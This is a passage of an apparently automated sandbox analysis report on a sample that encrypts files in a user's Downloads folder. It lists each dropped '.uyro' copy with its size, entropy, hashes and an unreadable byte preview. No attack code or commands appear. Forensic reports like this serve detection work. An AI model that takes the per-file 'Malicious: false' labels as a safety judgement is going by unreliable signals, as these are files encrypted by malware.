Preview:	NWTVCb......-..1.7.B..:.......F...?.++.W.T..B.H.......T#.....j..-;......1..sr.....{0I.';.c.]..}......s3.x...'..u.X.hdCW}>+...,j(.IV&.q.fZ.9.....-#.Q...0......>..nW?..u.t...F.Z.MUR7.$.ZS"U&.....H.s.^d.I.s.k..}.f................t..V.e^.....z..x.v.\|.@..vL..tQ..v[......-?.......?..B`.n.4.-.]5.a..x..W..t.D....;~.{.cG."...SS\|. ..Tzm.S..xy...X...y..1J..D..k~.."......i.@.F.~)..!..J.\|.....+&pXS6H....J........ZQ..@..X.......t..!....X....6.S.L7.Z....... .t/.....+vE..D...0.7.#~:9....E..N....{9....S..}. A...4jS...4.}P%S..F..X...\...X. O..].d..m)q..)s.p..f.\|PU.X..xA......3....e.a.-....:2.\..E.}."f....k.q..HqR..v'C.K.p.i.,../..j.l.`..~cv.......X0.V.....[...).a..O.JN/...A.iF&..f\|..?\."6.wM."'z....I..^.s...@......;.4...v..1.q..T{.4&R..x.,G.R..-...(...$?.F..f!SK.....2.}.m..$.i.I!.......a..QU:.b....q..'..G(x..F.W.M.eq.r...n"..^...r.FT._.X..dnx..b4."..\.%.....yX.v.@..zZ&...gx..t..0.kT.U..g.B...E.R....+.}3. .b.v'B/..I...G.IM..\| y......F...

C:\Users\user\Downloads\NWTVCDUMOB.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.83768745118661
Encrypted:	false
SSDEEP:	24:nxzvFUO0cIqc8EzQ3JiuaouAmWTyWcldUxWv+SY6qcQDiD3xc8huSIZ86tTbD:xScIqh3o7I52rv+7SQDiC8huS569D
MD5:	6C3238C010D76858B4CE0688F2AD0BC9
SHA1:	7A8AC065754BEFAA0C2EBC6E8552B1FFAEC3DBCF
SHA-256:	A3F4916C0E313CF40C9B2D06F995B844D3BF28C10809E2BA2663DDD1FB7AB7CE
SHA-512:	E8091155C7AAA94806D26852D0A6238B3139CF5B5F8C34DF615D058574D666977816CD1C640543A428A1FFDB160FEDE2EF8D56604989012BB881BE9E8E120A80
Malicious:	false
Reputation:	unknown
Preview:	NWTVCb......-..1.7.B..:.......F...?.++.W.T..B.H.......T#.....j..-;......1..sr.....{0I.';.c.]..}......s3.x...'..u.X.hdCW}>+...,j(.IV&.q.fZ.9.....-#.Q...0......>..nW?..u.t...F.Z.MUR7.$.ZS"U&.....H.s.^d.I.s.k..}.f................t..V.e^.....z..x.v.\|.@..vL..tQ..v[......-?.......?..B`.n.4.-.]5.a..x..W..t.D....;~.{.cG."...SS\|. ..Tzm.S..xy...X...y..1J..D..k~.."......i.@.F.~)..!..J.\|.....+&pXS6H....J........ZQ..@..X.......t..!....X....6.S.L7.Z....... .t/.....+vE..D...0.7.#~:9....E..N....{9....S..}. A...4jS...4.}P%S..F..X...\...X. O..].d..m)q..)s.p..f.\|PU.X..xA......3....e.a.-....:2.\..E.}."f....k.q..HqR..v'C.K.p.i.,../..j.l.`..~cv.......X0.V.....[...).a..O.JN/...A.iF&..f\|..?\."6.wM."'z....I..^.s...@......;.4...v..1.q..T{.4&R..x.,G.R..-...(...$?.F..f!SK.....2.}.m..$.i.I!.......a..QU:.b....q..'..G(x..F.W.M.eq.r...n"..^...r.FT._.X..dnx..b4."..\.%.....yX.v.@..zZ&...gx..t..0.kT.U..g.B...E.R....+.}3. .b.v'B/..I...G.IM..\| y......F...

C:\Users\user\Downloads\QNCYCDFIJJ.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.870603908041746
Encrypted:	false
SSDEEP:	24:JQa8kgCFEaVqeQbCXeUrQhKcEQGj7nhi3LzuL7/ap2SzYBACzibD:uaNfymcWTIKcEQGfhCnuL7CBizwD
MD5:	9C4F66C015B4D5C62996EA92DA501198
SHA1:	9BFB2B90C430FBFC310E6D67995C9586A57ABAD5
SHA-256:	2D80EFFE030C1578B34FBD4EA62A7FCDAB58E37298ED22FFABA971E97F5B2DC2
SHA-512:	9B0FA03D5D0C98FE96D137268EC5656AD397913D299CDE264706722DD43CEB46E4D53BD245373AB46756703048984C331C375505789B1758FBCEE787E207CAC8
Malicious:	false
Reputation:	unknown
Preview:	QNCYC5.d.....Xu..;p...G.i..x.9........`...>%,....Ea./...~0v...5.?..[..@.-.,....(..4..Pk%.G>6gB..M.r..W..-.%.,...Y....(m..vb.Z..a...S`......q..g..a.4.g3.2............W.....L]..].Fy.....{~....c+..yP6.\YT$.z..~.%...L./..}A......^a..U.....".^...)d....EX....92.{.6...\|..'...8g...D\n......b.....9....`..O..i!......(`.h`.jE..I..C..R..Q$..}...\|....-....Z..x....L..R.Xf$. vg.]Nm...]....p+.K+...4..........(........KZ..KF..8..:...S.3.m..s6.^kU.....sUr.......G&..D:.a......8>Q.\|......A\..-..G(eD.S.E0.o....+.."C.<>.?..s......R.V.....{...C...H.p.K@..+..Q...B.]5.r.{.v...+b.D.1..X..K.3.........[.'..r.\.G...J.......:...$_.8@k.0..O.m........gW.....b\|..J.......y.yh.F..vp.....vnp..$.kQ...:..JvM.u2tdq`?..pI.U...jh....wv.. n....5..G....c.?..g.....:...2..m..B.....@y04r..8).4.6}....."..`....$.=`.-...bq...0...2..IF.7'...n.C4.I.._...`.W..ZC..'8..CgI..Z......{nC..z.)...../..HP.kBH.....Y?i".O.~)#=^....t...{....A..z..j..oq......x..,...G....cb&t..._.mmY.)'=..@.NU

C:\Users\user\Downloads\QNCYCDFIJJ.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.870603908041746
Encrypted:	false
SSDEEP:	24:JQa8kgCFEaVqeQbCXeUrQhKcEQGj7nhi3LzuL7/ap2SzYBACzibD:uaNfymcWTIKcEQGfhCnuL7CBizwD
MD5:	9C4F66C015B4D5C62996EA92DA501198
SHA1:	9BFB2B90C430FBFC310E6D67995C9586A57ABAD5
SHA-256:	2D80EFFE030C1578B34FBD4EA62A7FCDAB58E37298ED22FFABA971E97F5B2DC2
SHA-512:	9B0FA03D5D0C98FE96D137268EC5656AD397913D299CDE264706722DD43CEB46E4D53BD245373AB46756703048984C331C375505789B1758FBCEE787E207CAC8
Malicious:	false
Reputation:	unknown
Preview:	QNCYC5.d.....Xu..;p...G.i..x.9........`...>%,....Ea./...~0v...5.?..[..@.-.,....(..4..Pk%.G>6gB..M.r..W..-.%.,...Y....(m..vb.Z..a...S`......q..g..a.4.g3.2............W.....L]..].Fy.....{~....c+..yP6.\YT$.z..~.%...L./..}A......^a..U.....".^...)d....EX....92.{.6...\|..'...8g...D\n......b.....9....`..O..i!......(`.h`.jE..I..C..R..Q$..}...\|....-....Z..x....L..R.Xf$. vg.]Nm...]....p+.K+...4..........(........KZ..KF..8..:...S.3.m..s6.^kU.....sUr.......G&..D:.a......8>Q.\|......A\..-..G(eD.S.E0.o....+.."C.<>.?..s......R.V.....{...C...H.p.K@..+..Q...B.]5.r.{.v...+b.D.1..X..K.3.........[.'..r.\.G...J.......:...$_.8@k.0..O.m........gW.....b\|..J.......y.yh.F..vp.....vnp..$.kQ...:..JvM.u2tdq`?..pI.U...jh....wv.. n....5..G....c.?..g.....:...2..m..B.....@y04r..8).4.6}....."..`....$.=`.-...bq...0...2..IF.7'...n.C4.I.._...`.W..ZC..'8..CgI..Z......{nC..z.)...../..HP.kBH.....Y?i".O.~)#=^....t...{....A..z..j..oq......x..,...G....cb&t..._.mmY.)'=..@.NU

C:\Users\user\Downloads\RAYHIWGKDI.pdf

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848186111981661
Encrypted:	false
SSDEEP:	24:Y8fIj0cNmImQfAaniITsh9yCaqkl08QU43pvgA7vVpHdLNByk8MOHebD:Y1jtEwAaiY5KPJU04AhpXSMO8D
MD5:	E8BADCB4BC5126B56D4F4E7E15576721
SHA1:	B50609A25A8171C7D5324B248000EBF1595AD8C2
SHA-256:	2182F9EF8D1CE43B7EB40C4053CE712C3D7B503F63EFF2A0A467BAE305241162
SHA-512:	3C1CF12A10B774320941328004E6B48F5DD475DD0E35EB2C7887BBC2954D46A0E96642AF4CF00009EB744284ACBF66BA9F35628DB92AF231519C378951A27211
Malicious:	false
Reputation:	unknown
Preview:	RAYHI..uK.A4..^o..-........;.v..F..>......t/F.R.P.5.7...7>7...yr..\|...C.X=}.....>...WlF2Q..4H..`.<...>...g.B(.Fj`..iF6.t..+...o.r.c........Q..`.<(....nVY..4.:.&.^s..k..q..)$A2..ON.yk..7E>.@i...v.(..a..S..k+.l.....q@A...z...8QY....G.m.~.{._+.L....9.f=..UY...Q.G2..8...`[V.2.`...\|.876...N..}.....$cl...m.'..5..8..+.l.....e.....:~.Ix...MC.e..7..A.OO.I.@...!....nl.P...u .g......H...n.m....<.s..C.......).2tS[(KgOS'KY..[....8..._v.)U..e..e...cm...6.lg`v....}}/.......!v..aq.X...{~g.2..H.a.F3.."..8..W..._...HxHj^...7..K....X.idm..!..#.L...\|>..)3\6.#...i...n2..s&....\.w..........8<1.0\|...[/....h&...U..l...\|k...?....u...l~L....=...e"Q.....S..E.V........Nb..wN.z.RE..%f..(D.../o.9...L.hr.a..$....@p.?.s6...3.b.BB..!..,.5R.k...=..J.q.(...U!..el ...P..0.^..a...q@.\.7slt...0...W...W.n.....-T......`.K.%.....Z.$.fX...!Q..-\|`.7..{OB.Vg.8s.p.c...g.3..g9.'O...7.}..qb,..5E..7V.........+...`..ye....!4J.. ..[..,g...n..>.,d.....b....&..:....<.N.E..m..j.5.,

C:\Users\user\Downloads\RAYHIWGKDI.pdf.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848186111981661
Encrypted:	false
SSDEEP:	24:Y8fIj0cNmImQfAaniITsh9yCaqkl08QU43pvgA7vVpHdLNByk8MOHebD:Y1jtEwAaiY5KPJU04AhpXSMO8D
MD5:	E8BADCB4BC5126B56D4F4E7E15576721
SHA1:	B50609A25A8171C7D5324B248000EBF1595AD8C2
SHA-256:	2182F9EF8D1CE43B7EB40C4053CE712C3D7B503F63EFF2A0A467BAE305241162
SHA-512:	3C1CF12A10B774320941328004E6B48F5DD475DD0E35EB2C7887BBC2954D46A0E96642AF4CF00009EB744284ACBF66BA9F35628DB92AF231519C378951A27211
Malicious:	false
Reputation:	unknown
Preview:	RAYHI..uK.A4..^o..-........;.v..F..>......t/F.R.P.5.7...7>7...yr..\|...C.X=}.....>...WlF2Q..4H..`.<...>...g.B(.Fj`..iF6.t..+...o.r.c........Q..`.<(....nVY..4.:.&.^s..k..q..)$A2..ON.yk..7E>.@i...v.(..a..S..k+.l.....q@A...z...8QY....G.m.~.{._+.L....9.f=..UY...Q.G2..8...`[V.2.`...\|.876...N..}.....$cl...m.'..5..8..+.l.....e.....:~.Ix...MC.e..7..A.OO.I.@...!....nl.P...u .g......H...n.m....<.s..C.......).2tS[(KgOS'KY..[....8..._v.)U..e..e...cm...6.lg`v....}}/.......!v..aq.X...{~g.2..H.a.F3.."..8..W..._...HxHj^...7..K....X.idm..!..#.L...\|>..)3\6.#...i...n2..s&....\.w..........8<1.0\|...[/....h&...U..l...\|k...?....u...l~L....=...e"Q.....S..E.V........Nb..wN.z.RE..%f..(D.../o.9...L.hr.a..$....@p.?.s6...3.b.BB..!..,.5R.k...=..J.q.(...U!..el ...P..0.^..a...q@.\.7slt...0...W...W.n.....-T......`.K.%.....Z.$.fX...!Q..-\|`.7..{OB.Vg.8s.p.c...g.3..g9.'O...7.}..qb,..5E..7V.........+...`..ye....!4J.. ..[..,g...n..>.,d.....b....&..:....<.N.E..m..j.5.,

C:\Users\user\Downloads\SFPUSAFIOL.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.847005936233102
Encrypted:	false
SSDEEP:	24:EB5B2hprcyAB//iztBMiG5SIxMztO8yyBKL6pVFSzz2sZ9l7gwsbD:EDB0rcyKXGBywBXQL6huzTfmD
MD5:	367B514DAF8418A0ED7402A850DF5172
SHA1:	5B8EA03AE200C92005949774E9F9594F28AB98A8
SHA-256:	FF7BCF7D07C0032207599709BE0711D81EB48411118E6727A77FED2ABA25B4E4
SHA-512:	D43DE71E1B3E748E15463C41AAFD12A1A99960F655A1A171D1D3C68B2F040F51C50EFAACFC6E138993A75ECEDAF3061BF6FAD3327727E335F3AA366F7E744D19
Malicious:	false
Reputation:	unknown
Preview:	SFPUS.....{.]........L..^$..m8..<&.....c&..N.=..M. .,;.......o.9Pu9............,.e.&3xd......'&lPz.....i..SlR>..$...3..w...R.....+N...<....U.-....Oa.:i....U.n.?.k.>%.p..`.J...Bl3.V.......O-...7.........n.Q`xz...`...l.,...K.`=.$....2.9.c,7a..0....=.@G...~;....;..;.....Q....i.. 3.t}...<....`f..].;K.....T.ALQ,.....QYx....q.........._....(_b*.d]..W..!..p...K....4A<O..n......b..x.\|".Q..!V...~...N.!Y..j1.A..?bc......`..T)l....%D..N..7&t...lDM..........tJ.lJ($.....`..h.......!.)P...x4.2....w2;...)...H1./.....U...q0(..V.f->..8Gu..5j..g.r...B...%.....1....B....f.rN.....z.".X._.y./{H.. .Hu..I.J9..>...k..\|Iy..."O...ZA.B.Mk\...IV........D..M..Bl...b....2p....F.#.$............T......4.m.sj.z...l..L...+S?+...~Z....Y..`Y`..s.i1.....@G.U...f`....;X.....<.u.>..=m.DAN......9.,....e.[............r;dHf=&.9.%..,>.bO..@.2.]W...._.D..........."......'r..e{..B...."...G.m..F...u...8..U..y.F.e....`c.....<.....M.O...."?..i..z......'..8.}..a......`.S...P.....dy9...r..

C:\Users\user\Downloads\SFPUSAFIOL.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.847005936233102
Encrypted:	false
SSDEEP:	24:EB5B2hprcyAB//iztBMiG5SIxMztO8yyBKL6pVFSzz2sZ9l7gwsbD:EDB0rcyKXGBywBXQL6huzTfmD
MD5:	367B514DAF8418A0ED7402A850DF5172
SHA1:	5B8EA03AE200C92005949774E9F9594F28AB98A8
SHA-256:	FF7BCF7D07C0032207599709BE0711D81EB48411118E6727A77FED2ABA25B4E4
SHA-512:	D43DE71E1B3E748E15463C41AAFD12A1A99960F655A1A171D1D3C68B2F040F51C50EFAACFC6E138993A75ECEDAF3061BF6FAD3327727E335F3AA366F7E744D19
Malicious:	false
Reputation:	unknown
Preview:	SFPUS.....{.]........L..^$..m8..<&.....c&..N.=..M. .,;.......o.9Pu9............,.e.&3xd......'&lPz.....i..SlR>..$...3..w...R.....+N...<....U.-....Oa.:i....U.n.?.k.>%.p..`.J...Bl3.V.......O-...7.........n.Q`xz...`...l.,...K.`=.$....2.9.c,7a..0....=.@G...~;....;..;.....Q....i.. 3.t}...<....`f..].;K.....T.ALQ,.....QYx....q.........._....(_b*.d]..W..!..p...K....4A<O..n......b..x.\|".Q..!V...~...N.!Y..j1.A..?bc......`..T)l....%D..N..7&t...lDM..........tJ.lJ($.....`..h.......!.)P...x4.2....w2;...)...H1./.....U...q0(..V.f->..8Gu..5j..g.r...B...%.....1....B....f.rN.....z.".X._.y./{H.. .Hu..I.J9..>...k..\|Iy..."O...ZA.B.Mk\...IV........D..M..Bl...b....2p....F.#.$............T......4.m.sj.z...l..L...+S?+...~Z....Y..`Y`..s.i1.....@G.U...f`....;X.....<.u.>..=m.DAN......9.,....e.[............r;dHf=&.9.%..,>.bO..@.2.]W...._.D..........."......'r..e{..B...."...G.m..F...u...8..U..y.F.e....`c.....<.....M.O...."?..i..z......'..8.}..a......`.S...P.....dy9...r..

C:\Users\user\Downloads\SQRKHNBNYN.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858026783866997
Encrypted:	false
SSDEEP:	24:FtO1AmpUlhQ4AVBqyvSI9hRwfil1TU674Yf2GakHDAyn9MfTvbF4bD:FtBmpZVBqpWhialtF7sGaID/9oTvAD
MD5:	BBE23490DF886D66CE41B6F376945F83
SHA1:	DF7B5689D0DE31F5FE9940A5AA5107DF0CDA5342
SHA-256:	F23ECE9DB9E521A83130FD3F29BDC74A60402F2D2C99661FC96E1368B6D49A4D
SHA-512:	B4CB2ED31285F9A9B711759C63BC8544FEC3E917B98D7510582747EE817941B1FE1F0D2BE5345DC4F724794E829F272007B6183C6B04941A8A1C719251E7144A
Malicious:	false
Reputation:	unknown
Preview:	SQRKH...X..Q.8..h...C.F.9.)@.=..(.:..G..^..zf......6.O..Y._.J.....R...MgV..n..v....(.3..0....E.,......p.........}.$W....O.......E..C[............y;m]..^j.:.:w..j:g....v.y_.99{....Ze~..}>.$.~.5.....)....-...A.uer.....k.D....I...A&.U..:E.)W.....Rc....?..D..&..R]....fK(.l..#..pLz.....hO;e.c.T.......c..$.,s.og.yX...>.E....=....BT?.U........jU..FJ......]...39UX}...p......\.o.7P..._...Tx...,.. .N....U......I..I........P......b..`+..9.8;`.}..<.....O.....66C...HF<..~&..S...E:.30.D.\|.h..!._...}(...J.@...g......p...y..M&X.eA99.^.6.FE..y7...mz#....Q.. s......5.*[l...'....0t.<....)1.....h..uz.......i..._.......!.^....T....w.$Y......+{%<.!&f...p..4.y...Y..y......B&..}..0l...8....k....H.....h..q.S>...........Y.c.B..6..w.......wOC.....!HZ$;....eMk.....G...D..$..........il...S-.Y.A%....2'.J.....P}3B....H....d.."!.A.#$.h..z...,....i...QW...U.r......_.........w.n.W...I.uRN...2....E....b.cM.b~.9.05..ka.?s...F<N.-N&<..W....u.{q.......YY..........t...O>z..1.\.b.B..

C:\Users\user\Downloads\SQRKHNBNYN.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858026783866997
Encrypted:	false
SSDEEP:	24:FtO1AmpUlhQ4AVBqyvSI9hRwfil1TU674Yf2GakHDAyn9MfTvbF4bD:FtBmpZVBqpWhialtF7sGaID/9oTvAD
MD5:	BBE23490DF886D66CE41B6F376945F83
SHA1:	DF7B5689D0DE31F5FE9940A5AA5107DF0CDA5342
SHA-256:	F23ECE9DB9E521A83130FD3F29BDC74A60402F2D2C99661FC96E1368B6D49A4D
SHA-512:	B4CB2ED31285F9A9B711759C63BC8544FEC3E917B98D7510582747EE817941B1FE1F0D2BE5345DC4F724794E829F272007B6183C6B04941A8A1C719251E7144A
Malicious:	false
Reputation:	unknown
Preview:	SQRKH...X..Q.8..h...C.F.9.)@.=..(.:..G..^..zf......6.O..Y._.J.....R...MgV..n..v....(.3..0....E.,......p.........}.$W....O.......E..C[............y;m]..^j.:.:w..j:g....v.y_.99{....Ze~..}>.$.~.5.....)....-...A.uer.....k.D....I...A&.U..:E.)W.....Rc....?..D..&..R]....fK(.l..#..pLz.....hO;e.c.T.......c..$.,s.og.yX...>.E....=....BT?.U........jU..FJ......]...39UX}...p......\.o.7P..._...Tx...,.. .N....U......I..I........P......b..`+..9.8;`.}..<.....O.....66C...HF<..~&..S...E:.30.D.\|.h..!._...}(...J.@...g......p...y..M&X.eA99.^.6.FE..y7...mz#....Q.. s......5.*[l...'....0t.<....)1.....h..uz.......i..._.......!.^....T....w.$Y......+{%<.!&f...p..4.y...Y..y......B&..}..0l...8....k....H.....h..q.S>...........Y.c.B..6..w.......wOC.....!HZ$;....eMk.....G...D..$..........il...S-.Y.A%....2'.J.....P}3B....H....d.."!.A.#$.h..z...,....i...QW...U.r......_.........w.n.W...I.uRN...2....E....b.cM.b~.9.05..ka.?s...F<N.-N&<..W....u.{q.......YY..........t...O>z..1.\.b.B..

C:\Users\user\Downloads\UOOJJOZIRH.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860224500349798
Encrypted:	false
SSDEEP:	24:QI5z6p0C20oXxHpVl8gbJYcWYZQMxskk9DYEXbquRlaWeE1q9m0vHbD:PMpaXxJVl8gJWYhT0BrT+EY9mi7D
MD5:	94DE8947A2C3D32BBBB3697DBFDF2C9A
SHA1:	BC923B121C71203E85061691EDE4CA8B9CAADFD9
SHA-256:	A197B6203DEEA3274B913D64EFABD3565B1229424FA41025EE46791153B155DA
SHA-512:	49C7345B1EE34001CEFC7500B516D8ACF398E02CB57D1ABE4A3CE559777A5ABF774BAB3B9B65AC9A9E7C8B5EE84362662F757157417FBEE37746D5CB6F19B242
Malicious:	false
Reputation:	unknown
Preview:	UOOJJ~y.V .&..Z...5`e....-...>o..R._.M..`.....].#.~.b.\.x.h.....Q.,.....].'.@.lU..y.h.Wbuh..}../..\..=.@R...........}...<......9.@.4F...%J.....^.C.-$.?h...6:...o/..{...Gv.o...z.%I.....Jyl_F..p.^{..ES..7Ap._...l.b..\|'..'.C.j...%.L.........s$z.@.. aLi...Q..F...j.....A.M7...6.......h\...K..zW...z..m.X.fQ...${...HN......iU-qgQB..;7E@...\|.. %...x....>.)u..d.5..P&.>.c.S.V?.........g.f.#..z@....b..s..@W..m..w..gT%...A.....y.. .`;.......5+<F./..m....Y....1.Z...pu.d...4D....p..d ....X"f0?...q~m..6F.t\|...r.e;Y......c#...u..,b.d...1k.>...n.....5.`.........d.......u.xR!........N..!.C...&......-.:......a._....'........2.5X.df..c%K..i.\ i..... ...\|.@Mh''.R.f...s.]..I......:.1.w...]=.x\|...[N...~...rX.hP%....T./)...Qz.ZZ..'.....G. .V..[v...$..z...a.].W...uba..^..f..`%........^6l..7.............@.......{4.87...."...xi......A.a..=....h.^].....>%....5$.]+.5X....c.. .....6o.).].S......6.j....`.gd?......;.p....R.... *. .yNZ......;..]q.b..Dw.BR..'....

C:\Users\user\Downloads\UOOJJOZIRH.jpg.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860224500349798
Encrypted:	false
SSDEEP:	24:QI5z6p0C20oXxHpVl8gbJYcWYZQMxskk9DYEXbquRlaWeE1q9m0vHbD:PMpaXxJVl8gJWYhT0BrT+EY9mi7D
MD5:	94DE8947A2C3D32BBBB3697DBFDF2C9A
SHA1:	BC923B121C71203E85061691EDE4CA8B9CAADFD9
SHA-256:	A197B6203DEEA3274B913D64EFABD3565B1229424FA41025EE46791153B155DA
SHA-512:	49C7345B1EE34001CEFC7500B516D8ACF398E02CB57D1ABE4A3CE559777A5ABF774BAB3B9B65AC9A9E7C8B5EE84362662F757157417FBEE37746D5CB6F19B242
Malicious:	false
Reputation:	unknown
Preview:	UOOJJ~y.V .&..Z...5`e....-...>o..R._.M..`.....].#.~.b.\.x.h.....Q.,.....].'.@.lU..y.h.Wbuh..}../..\..=.@R...........}...<......9.@.4F...%J.....^.C.-$.?h...6:...o/..{...Gv.o...z.%I.....Jyl_F..p.^{..ES..7Ap._...l.b..\|'..'.C.j...%.L.........s$z.@.. aLi...Q..F...j.....A.M7...6.......h\...K..zW...z..m.X.fQ...${...HN......iU-qgQB..;7E@...\|.. %...x....>.)u..d.5..P&.>.c.S.V?.........g.f.#..z@....b..s..@W..m..w..gT%...A.....y.. .`;.......5+<F./..m....Y....1.Z...pu.d...4D....p..d ....X"f0?...q~m..6F.t\|...r.e;Y......c#...u..,b.d...1k.>...n.....5.`.........d.......u.xR!........N..!.C...&......-.:......a._....'........2.5X.df..c%K..i.\ i..... ...\|.@Mh''.R.f...s.]..I......:.1.w...]=.x\|...[N...~...rX.hP%....T./)...Qz.ZZ..'.....G. .V..[v...$..z...a.].W...uba..^..f..`%........^6l..7.............@.......{4.87...."...xi......A.a..=....h.^].....>%....5$.]+.5X....c.. .....6o.).].S......6.j....`.gd?......;.p....R.... *. .yNZ......;..]q.b..Dw.BR..'....

C:\Users\user\Downloads\WKXEWIOTXI.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8564263306398745
Encrypted:	false
SSDEEP:	24:QOMfGm4M777j6C5g5pMsfgMjoaZT7jZTT8jAxtKovcCHfQbD:QNGm4gDl5JsnDZ3tcAxtLccfKD
MD5:	D4948FDDAE96065BE24C681693C4663D
SHA1:	0B48A228087D58E29611974DA2C472A1FC0228B2
SHA-256:	6EEFCF719D7B43861D1AD47A2F7753D93C78D1337C72A229986EA9D9D4688B55
SHA-512:	647633CB58EEC34320FA8958C974A4621EA5DB8BB7CB772A9C50728A9287BA9E4BAEBF12F28E013F9605D7D1B6D1114DAB46050BF2AD37A348C5D66A5A7322FD
Malicious:	false
Reputation:	unknown
Preview:	WKXEW..u...d.=..2'.}..E.......%.=.[WW...+Vp2&...8.9>.....f..S....<..........Y.gO6...u.I.rf.....m...1.DL,L.-..4....VRj...b6.d5..p."....k..../.e..].o.H....[..?.%25..L.'..(....c.>..\|c.(...H.y..$..?....<b.%..G.....$..x.g3j...6.b....+....7]..?..T.....R..q..%.%.i..E...x.#.......wI..6..<....I.I.lL....B.;....j#....)....7.{.}f...3...l......H.f..=P./.]...O.......S............K;...Z= ..N.AD..>M...<O.:../....M....oB&........\..gZN...lG.......K.^CZ%8....[....R.Ro...:..3:....W>.....v..j....W.i.....[..9C..-OV.W....~;.B...k.P..^..]6.;..Ms.Y....nNU/....?....$J.TK.?E....cUL.H]..>X.l..j...&..RI....j........D.$.&..8"..D.A.H.irtgu..H(.I...W.l;.R....I...f......l.ED.V..J'.m....U.....\|p....8.3...;.].+..~.....b.......y....}....\..I.K.w.=......a.....8..QEI.E`.....R.I2...\|..[!...l$#.......OIP."...0.:....2U.aW...#.gS.d..bz..f..[_...A.[Xm.z..%..i...<}.vCt'.^%M.1....k.......f...D.O.{,.?Q.`g.5.`..c.H...&..Q......]..j.,".(....}T..].........5..`8..r...s..]...s..2PZ..

C:\Users\user\Downloads\WKXEWIOTXI.jpg.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8564263306398745
Encrypted:	false
SSDEEP:	24:QOMfGm4M777j6C5g5pMsfgMjoaZT7jZTT8jAxtKovcCHfQbD:QNGm4gDl5JsnDZ3tcAxtLccfKD
MD5:	D4948FDDAE96065BE24C681693C4663D
SHA1:	0B48A228087D58E29611974DA2C472A1FC0228B2
SHA-256:	6EEFCF719D7B43861D1AD47A2F7753D93C78D1337C72A229986EA9D9D4688B55
SHA-512:	647633CB58EEC34320FA8958C974A4621EA5DB8BB7CB772A9C50728A9287BA9E4BAEBF12F28E013F9605D7D1B6D1114DAB46050BF2AD37A348C5D66A5A7322FD
Malicious:	false
Reputation:	unknown
Preview:	WKXEW..u...d.=..2'.}..E.......%.=.[WW...+Vp2&...8.9>.....f..S....<..........Y.gO6...u.I.rf.....m...1.DL,L.-..4....VRj...b6.d5..p."....k..../.e..].o.H....[..?.%25..L.'..(....c.>..\|c.(...H.y..$..?....<b.%..G.....$..x.g3j...6.b....+....7]..?..T.....R..q..%.%.i..E...x.#.......wI..6..<....I.I.lL....B.;....j#....)....7.{.}f...3...l......H.f..=P./.]...O.......S............K;...Z= ..N.AD..>M...<O.:../....M....oB&........\..gZN...lG.......K.^CZ%8....[....R.Ro...:..3:....W>.....v..j....W.i.....[..9C..-OV.W....~;.B...k.P..^..]6.;..Ms.Y....nNU/....?....$J.TK.?E....cUL.H]..>X.l..j...&..RI....j........D.$.&..8"..D.A.H.irtgu..H(.I...W.l;.R....I...f......l.ED.V..J'.m....U.....\|p....8.3...;.].+..~.....b.......y....}....\..I.K.w.=......a.....8..QEI.E`.....R.I2...\|..[!...l$#.......OIP."...0.:....2U.aW...#.gS.d..bz..f..[_...A.[Xm.z..%..i...<}.vCt'.^%M.1....k.......f...D.O.{,.?Q.`g.5.`..c.H...&..Q......]..j.,".(....}T..].........5..`8..r...s..]...s..2PZ..

C:\Users\user\Downloads\WKXEWIOTXI.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865550247714059
Encrypted:	false
SSDEEP:	24:CpJPZBSpNr87JnxlpTvpxTdZmuzzFMl4/p9fYP0AYXUwPbX2XaMsj4bD:CjPZEpF87JrDZLzzFMloghnwCXakD
MD5:	F4FDDE1D534D97ECC9B1EE562BD1D35E
SHA1:	62831713D516053CA445F82C3DB48DEB2F02F3AC
SHA-256:	D5C088501DF887F781BC1773A53CADC548290CC6144EC8304D69B75F524B64AC
SHA-512:	58CA5BD9CDD8545498CCF03D3F6825AAB9A571D1602CD58559AF2E131982A38957046CFBAEC4B09C97E2E3B50DD200BA987E40E469C6325107771D9B105F879E
Malicious:	false
Reputation:	unknown
